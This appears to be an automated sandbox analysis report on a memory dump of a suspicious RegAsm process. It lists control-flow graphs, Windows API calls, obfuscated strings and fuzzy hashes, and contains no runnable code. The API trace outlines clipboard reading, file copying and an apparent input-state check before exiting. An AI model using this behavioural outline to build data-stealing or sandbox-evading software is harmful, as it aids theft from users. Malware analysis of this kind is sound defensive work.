                                                                                                                                                                                                                                                                                      execution_graph 20798 40d3c0 20799 40d3c9 20798->20799 20800 40d3d1 GetInputState 20799->20800 20801 40d5ae ExitProcess 20799->20801 20802 40d3de 20800->20802 20803 40d3e6 GetCurrentThreadId GetCurrentProcessId 20802->20803 20804 40d5a4 20802->20804 20805 40d41d 20803->20805 20804->20801 20809 40ee70 20805->20809 20811 40ee98 20809->20811 20810 40ef5a LoadLibraryExW 20814 40ef6f 20810->20814 20811->20810 20812 40d59b 20812->20804 20815 412610 CoInitialize 20812->20815 20814->20812 20816 40f7b0 20814->20816 20819 40f7f2 20816->20819 20817 40fae4 20817->20814 20819->20817 20820 443160 20819->20820 20821 4431e0 20820->20821 20823 443176 20820->20823 20821->20817 20822 4431c6 RtlFreeHeap 20822->20821 20823->20822 20824 445294 20825 445304 LoadLibraryExW 20824->20825 20826 4452d9 20824->20826 20827 445316 20825->20827 20826->20825 20828 4471b4 20829 4471d0 20828->20829 20831 44721e 20829->20831 20835 446730 LdrInitializeThunk 20829->20835 20834 446730 LdrInitializeThunk 20831->20834 20833 4472cd 20834->20833 20835->20831 20836 446176 20837 446184 20836->20837 20841 4461e8 20836->20841 20838 4461f0 20837->20838 20842 446192 20837->20842 20839 443160 RtlFreeHeap 20838->20839 20839->20841 20840 4461d4 RtlReAllocateHeap 20840->20841 20842->20840 20848 443142 RtlAllocateHeap 20849 447132 20851 446c20 20849->20851 20850 4471a3 20851->20850 20854 446730 LdrInitializeThunk 20851->20854 20853 446ce5 20854->20853 20855 446cf3 20857 446cf8 20855->20857 20856 446dde 20857->20856 20859 446730 LdrInitializeThunk 20857->20859 20859->20856

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 61 40f7b0-40f7f0 62 40f7f2 61->62 63 40f826-40f936 61->63 64 40f800-40f824 call 411bc0 62->64 65 40f966-40f998 63->65 66 40f938 63->66 64->63 67 40f9c9-40f9d8 call 410760 65->67 68 40f99a 65->68 70 40f940-40f964 call 411cc0 66->70 76 40f9dd-40f9e2 67->76 71 40f9a0-40f9c7 call 411c40 68->71 70->65 71->67 79 40fae4-40fae6 76->79 80 40f9e8-40fa0d 76->80 83 40fcc2-40fccc 79->83 81 40fa36-40fa3f 80->81 82 40fa0f 80->82 85 40fa40-40fa4a 81->85 84 40fa10-40fa34 call 411d40 82->84 84->81 87 40fa51-40fa59 85->87 88 40fa4c-40fa4f 85->88 89 40fcb2-40fcbe call 443160 87->89 90 40fa5f-40fa7c 87->90 88->85 88->87 89->83 92 40faa6-40fab1 90->92 93 40fa7e-40fa7f 90->93 96 40fab3-40fab7 92->96 97 40faeb 92->97 95 40fa80-40faa4 call 411dc0 93->95 95->92 101 40fac7-40facb 96->101 99 40faed-40faef 97->99 102 40faf5-40fb36 99->102 103 40fcaa 99->103 101->103 105 40fad1-40fad8 101->105 106 40fb66-40fb71 102->106 107 40fb38 102->107 103->89 108 40fada-40fadc 105->108 109 40fade 105->109 111 40fb73-40fb7b 106->111 112 40fba4 106->112 110 40fb40-40fb64 call 411e50 107->110 108->109 113 40fac0-40fac5 109->113 114 40fae0-40fae2 109->114 110->106 116 40fb87-40fb8b 111->116 117 40fba6-40fba8 112->117 113->99 113->101 114->113 116->103 120 40fb91-40fb98 116->120 117->103 118 40fbae-40fbd3 117->118 121 40fbd5 118->121 122 40fc06-40fc0d 118->122 123 40fb9a-40fb9c 120->123 124 40fb9e 120->124 125 40fbe0-40fc04 call 411ed0 121->125 126 40fc40-40fc4c 122->126 127 40fc0f-40fc1c 122->127 123->124 128 40fb80-40fb85 124->128 129 40fba0-40fba2 124->129 125->122 132 40fcd3-40fcd8 126->132 131 40fc27-40fc2b 127->131 128->116 128->117 129->128 131->103 134 40fc2d-40fc34 131->134 132->89 135 40fc36-40fc38 134->135 136 40fc3a 134->136 135->136 137 40fc20-40fc25 136->137 138 40fc3c-40fc3e 136->138 137->131 139 40fc51-40fc53 137->139 138->137 139->103 140 40fc55-40fc6b 139->140 140->132 141 40fc6d-40fc6f 140->141 142 40fc73-40fc76 141->142 143 40fc78-40fc98 call 4117c0 142->143 144 40fccd 142->144 147 40fca2-40fca8 143->147 148 40fc9a-40fca0 143->148 144->132 147->132 148->142 148->147
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000002F.00000002.1496919109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_47_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: 2$1.$6(>*$=:li$Ga!1$ZABC$IK$MSO
                                                                                                                                                                                                                                                                                      • API String ID: 0-2205979412
                                                                                                                                                                                                                                                                                      • Opcode ID: dc0af39f46735f6fc8810d8d65a432b1349a7db07c574dc9d39223abff83bc0b
                                                                                                                                                                                                                                                                                      • Instruction ID: 8df93780a8b371d5a2a89ff6c21c9300b0c5160e97c6da9bd56ff8ebb28ea911
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dc0af39f46735f6fc8810d8d65a432b1349a7db07c574dc9d39223abff83bc0b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 37D15A7050C3808BD321DF188490A5FBBE1AF96748F580D3EE4D5AB792D339D949CB9A

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 408 446730-446762 LdrInitializeThunk
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • LdrInitializeThunk.NTDLL(0041380D,?,00000001,?), ref: 0044675E
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000002F.00000002.1496919109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_47_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                      • Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                                                                                                                                                                                                                                      • Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000002F.00000002.1496919109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_47_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CurrentProcess$ExitInputStateThread
                                                                                                                                                                                                                                                                                      • String ID: clmn$ohij
                                                                                                                                                                                                                                                                                      • API String ID: 1029096631-3567580053
                                                                                                                                                                                                                                                                                      • Opcode ID: 4c653ea9ada5344bda0104f52dcfa29158eed8f8ae5aa501a9de71a42c93f49e
                                                                                                                                                                                                                                                                                      • Instruction ID: 8f1940826fa5e4ef35febcdafd7184f7e4a9353c3ce711b8b38eacab782ab196
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4c653ea9ada5344bda0104f52dcfa29158eed8f8ae5aa501a9de71a42c93f49e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C841397480D380ABD701AF99D544A1EFBE1AF52709F548C2DE4C4A7392C73AD8588B6B

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 219 40ee70-40ee96 220 40ee98 219->220 221 40eec9-40ef1d 219->221 224 40eea0-40eec7 call 4119b0 220->224 222 40ef5a-40ef72 LoadLibraryExW call 4449b0 221->222 223 40ef1f 221->223 232 40ef80-40f0b4 call 4493d0 * 12 222->232 233 40f0c0-40f0c5 222->233 234 40f182-40f18f 222->234 235 40f1c5-40f1d1 222->235 236 40f1d8-40f2d5 222->236 237 40ef79-40ef7b 222->237 238 40f0cc-40f0d7 222->238 239 40f0de-40f0fb call 43fc40 222->239 225 40ef20-40ef58 call 411920 223->225 224->221 225->222 232->233 232->234 232->235 232->236 232->238 232->239 240 40f420-40f426 232->240 233->235 233->236 233->238 233->240 242 40f1b1-40f1be 234->242 243 40f191-40f195 234->243 235->236 235->240 246 40f2d7 236->246 247 40f31a-40f329 call 40fd20 236->247 244 40f763-40f76d 237->244 238->233 238->234 238->235 238->236 238->238 238->239 238->240 255 40f100-40f107 239->255 240->244 249 40f7a0 240->249 242->235 242->236 242->238 242->240 251 40f1a0-40f1af 243->251 253 40f2e0-40f318 call 411a40 246->253 254 40f32e-40f334 247->254 251->242 251->251 253->247 254->232 254->233 254->234 254->235 254->236 254->237 254->238 254->239 254->240 255->255 258 40f109-40f114 255->258 261 40f116-40f118 258->261 262 40f16a-40f170 call 40f7b0 258->262 266 40f120-40f123 261->266 268 40f175-40f17b 262->268 269 40f160-40f163 266->269 270 40f125-40f144 call 4117c0 266->270 268->233 268->234 268->235 268->236 268->238 268->240 272 40f166 269->272 277 40f146-40f14c 270->277 278 40f14e-40f154 270->278 272->262 277->266 277->278 278->272
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(03EB01F7,00000000), ref: 0040EF62
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000002F.00000002.1496919109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_47_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: LibraryLoad
                                                                                                                                                                                                                                                                                      • String ID: 9?
                                                                                                                                                                                                                                                                                      • API String ID: 1029625771-1150883898
                                                                                                                                                                                                                                                                                      • Opcode ID: 891c2fb76147fcbfd660747e054fe51af3fae1d98f06ff880934904054e5e699
                                                                                                                                                                                                                                                                                      • Instruction ID: 42b0cf5b6e489c6646c3492ae048cf3f7af35fd27ce82f5d7ffdcfcc6bce275d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 891c2fb76147fcbfd660747e054fe51af3fae1d98f06ff880934904054e5e699
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 81B1ACB0408380EBD311DF15FD4166BBBE1EBC6709F45083DE484AB262E7399958DB6B

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 321 445294-4452d7 322 445304-445310 LoadLibraryExW 321->322 323 4452d9 321->323 325 445685-446045 322->325 326 445316-445344 322->326 324 4452e0-445302 call 446520 323->324 324->322 326->325
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000800), ref: 0044530C
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000002F.00000002.1496919109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_47_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: LibraryLoad
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1029625771-0
                                                                                                                                                                                                                                                                                      • Opcode ID: a5ab4fafe27626d2c8abd12efacffb37336a606f183b878775e77db83958384e
                                                                                                                                                                                                                                                                                      • Instruction ID: 32cf0169799236ea817639a585a2fb97fc7d0b73a9cb276cd4531836bf098fa6
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a5ab4fafe27626d2c8abd12efacffb37336a606f183b878775e77db83958384e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4031C375D04296AFDB00CFA8D8502ADFFB1BB15341F684459D440B7352C734AB15CFA9

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 331 443160-44316f 332 443176-443192 331->332 333 4431f6-4431fa 331->333 334 4431f0 331->334 335 4431e0 331->335 336 443194 332->336 337 4431c6-4431df RtlFreeHeap 332->337 334->333 335->334 338 4431a0-4431c4 call 446610 336->338 337->335 338->337
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • RtlFreeHeap.NTDLL(6A69686F,00000000,?), ref: 004431D3
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000002F.00000002.1496919109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_47_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: FreeHeap
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3298025750-0
                                                                                                                                                                                                                                                                                      • Opcode ID: b531817381292eac37c55a32594c5c078c22521a7b44cc151e322e869f1473ef
                                                                                                                                                                                                                                                                                      • Instruction ID: 154aceb0a70e2b1c6176248329647f15dfba9260395587bf241fc84468e2c486
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b531817381292eac37c55a32594c5c078c22521a7b44cc151e322e869f1473ef
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E501693050C250DBD301AF18E958A0ABBF4EF4AB02F454C68E4C49B362D33ADD24CB9A

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 341 446176-44617d 342 446184-44618b 341->342 343 4461e8-4461ee call 4430d0 341->343 344 4461f0-4461f9 call 443160 342->344 345 446192-4461ab 342->345 351 4461fb-446202 343->351 344->351 349 4461d4-4461e6 RtlReAllocateHeap 345->349 350 4461ad-4461af 345->350 349->351 353 4461b0-4461d2 call 4466b0 350->353 353->349
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000002F.00000002.1496919109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_47_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: f850fbe3fdc24067df6dafc041743f2187b66143897b2b19b35a92ba6be7cc95
                                                                                                                                                                                                                                                                                      • Instruction ID: c80be1933921a698e0c592e0b6ed05ef8870e218a02cae1fee4b14558d0fb82e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f850fbe3fdc24067df6dafc041743f2187b66143897b2b19b35a92ba6be7cc95
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A5012431A00221DBDB058F94EC84AAFBB74FF47701F050866E811EB253D739C510CB6A

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 409 443142-443152 RtlAllocateHeap
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(?,00000000), ref: 00443148
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000002F.00000002.1496919109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_47_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 1d7f40c18e52b896ede2ec4de930e2bbf0d7d1e9d6beaefe7b6dc95e471b35e6
                                                                                                                                                                                                                                                                                      • Instruction ID: f2ee8ec3101e335420bd073388b79e1bdf2823782e18275de44ef30affdbbf4e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1d7f40c18e52b896ede2ec4de930e2bbf0d7d1e9d6beaefe7b6dc95e471b35e6
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3CB012300401209BC5141B05FC09F823F209F40661F110060F004480F2C15189A5C5E8
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00412A73
                                                                                                                                                                                                                                                                                      • CoUninitialize.OLE32 ref: 00412E6C
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000002F.00000002.1496919109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_47_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: DirectorySystemUninitialize
                                                                                                                                                                                                                                                                                      • String ID: "$&#($4`[b$AG$Bp$GD$Hhl&$KJML$ZW$[`ST$eg$il^l$jabc$kbe[$lebS$E(G$M.O
                                                                                                                                                                                                                                                                                      • API String ID: 1148197201-478676631
                                                                                                                                                                                                                                                                                      • Opcode ID: 9f4c5969fe8a5eddd0e57e92f89ec9b35c45a584b9d05200ef1b8fd4786e1316
                                                                                                                                                                                                                                                                                      • Instruction ID: a154919779fd4072897f30f9bc3923f1eb0742dabcc32d0001e9711257e26bbf
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9f4c5969fe8a5eddd0e57e92f89ec9b35c45a584b9d05200ef1b8fd4786e1316
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 04929AB4409380DBE3319F15D854BAFBBE0BF86309F44092DE8C99B292D7798545CB9B
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000002F.00000002.1496919109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_47_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: P$S$V$Z$[$\$]$_$`$a$d$f$g$i$l$n$o$q$r$s$u$v$w$x$y$z
                                                                                                                                                                                                                                                                                      • API String ID: 0-3259763545
                                                                                                                                                                                                                                                                                      • Opcode ID: e7b430297d4daa82d2ee96276e25c600f07b26410a494443fe52d93b69ee254d
                                                                                                                                                                                                                                                                                      • Instruction ID: 4401110ac37edf37dbfed5141fce7083dc067778e46c1e751ac666f55470cdb7
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e7b430297d4daa82d2ee96276e25c600f07b26410a494443fe52d93b69ee254d
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D5813EB010A3818BD3359F15C65C79FBAE4AB8630AF14894ED89C4B252D7F9524CDF8A
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000002F.00000002.1496919109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_47_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: !"#m$()./$-./ $1{z}$4`[b$89&'$89>?$9:;<$<=2$<=:;$J1$KJML$`Y^_$`cb,$ho$lonq$tuJK$twvy$ti${9$}e
                                                                                                                                                                                                                                                                                      • API String ID: 0-1498114528
                                                                                                                                                                                                                                                                                      • Opcode ID: 3b45da54bafb9dc989389a9b1cb054b09bd61fa5fb4c7e13a7f6b9c7d93e603b
                                                                                                                                                                                                                                                                                      • Instruction ID: f3d3a3b9562d9579cc5c61b8f9190f3ed33908b7696f0e2519a7b7f0b5dea788
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3b45da54bafb9dc989389a9b1cb054b09bd61fa5fb4c7e13a7f6b9c7d93e603b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 63A29BB06083919FE730CF14D880BAFBBE1AF85745F54482EE5899B392D7389845CB5B
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CopyFileW.KERNEL32(?,F73009C7,00000000), ref: 0042CDFE
                                                                                                                                                                                                                                                                                      • CopyFileW.KERNEL32(?,F73009C7,00000000), ref: 0042CE18
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000002F.00000002.1496919109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_47_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CopyFile
                                                                                                                                                                                                                                                                                      • String ID: $43>$3$4"$4`[b$7,4/$EA$Kq$Ptl
                                                                                                                                                                                                                                                                                      • API String ID: 1304948518-20478286
                                                                                                                                                                                                                                                                                      • Opcode ID: a176dbfb634374a1e2029c36eb98ecb84d1d17c26fe0ae52df837221c87049ed
                                                                                                                                                                                                                                                                                      • Instruction ID: b81faac139aef46914423daf8226ff62f86b0479c0f800528096bcdf50428678
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a176dbfb634374a1e2029c36eb98ecb84d1d17c26fe0ae52df837221c87049ed
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9FF1F0B59083418FD314DF28E890B2FBBE1BB85305F944A6DE4C59B392D778D811CB96
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000002F.00000002.1496919109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_47_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                                                                                                                                                                                                      • String ID: 1
                                                                                                                                                                                                                                                                                      • API String ID: 2832541153-2212294583
                                                                                                                                                                                                                                                                                      • Opcode ID: 5a454ec91e9a36368eff0b5d4c850976175d1299ed6c74cdecda597603a582f8
                                                                                                                                                                                                                                                                                      • Instruction ID: f36cfa37652498378e4bf6ea40e1c128cb36a214b7cd0d2cb612cf950a277a04
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5a454ec91e9a36368eff0b5d4c850976175d1299ed6c74cdecda597603a582f8
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4F41A370908785CFCB109BBC98443AEBFB0AB1A320F14066EE8E1A73C1D7384545D76B
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000002F.00000002.1496919109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_47_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: 45$4`[b$K^$L!Z'$M-_#$T1L7$W%];$Y9B?$\)K/
                                                                                                                                                                                                                                                                                      • API String ID: 0-3492956636
                                                                                                                                                                                                                                                                                      • Opcode ID: 7ab05631004dbb070588b28c96911a61e2ce0d81ef84c667a26946dd4b37b49c
                                                                                                                                                                                                                                                                                      • Instruction ID: bb9ddb114664236a20ee6ffbbf94cbad05b4f885d7b31be081541112c5d48008
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7ab05631004dbb070588b28c96911a61e2ce0d81ef84c667a26946dd4b37b49c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7C42BCB1A08381DFE310DF25E880B1ABBF1AF86315F544A2DE5D49B2A2D375D904CB5A
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000002F.00000002.1496919109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_47_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: 0s+q$4`[b$4`[b$c/g-$c3g1$d7`5$k;f9$k?y=$WU
                                                                                                                                                                                                                                                                                      • API String ID: 0-3796158802
                                                                                                                                                                                                                                                                                      • Opcode ID: d0dfb894b0915613e465af07aa6324aa60158193081e25567ee041c1b4c0fb37
                                                                                                                                                                                                                                                                                      • Instruction ID: 1a55b48c692521b91f5023f4e6cb518842c15b2f4da3044aa3e6e29af1fa9e42
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d0dfb894b0915613e465af07aa6324aa60158193081e25567ee041c1b4c0fb37
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4DF1CFB1E00208DFDF14CFA9E981AAE7BB1FF09305F544069EA01AB392D7359951CFA5
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SysStringLen.OLEAUT32(?), ref: 0043F295
                                                                                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 0043F465
                                                                                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 0043F4D6
                                                                                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 0043F4DB
                                                                                                                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 0043F4EF
                                                                                                                                                                                                                                                                                      • VariantInit.OLEAUT32(CF3CCD21), ref: 0043F579
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000002F.00000002.1496919109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_47_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: StringVariant$FreeInit$Clear
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2873403712-0
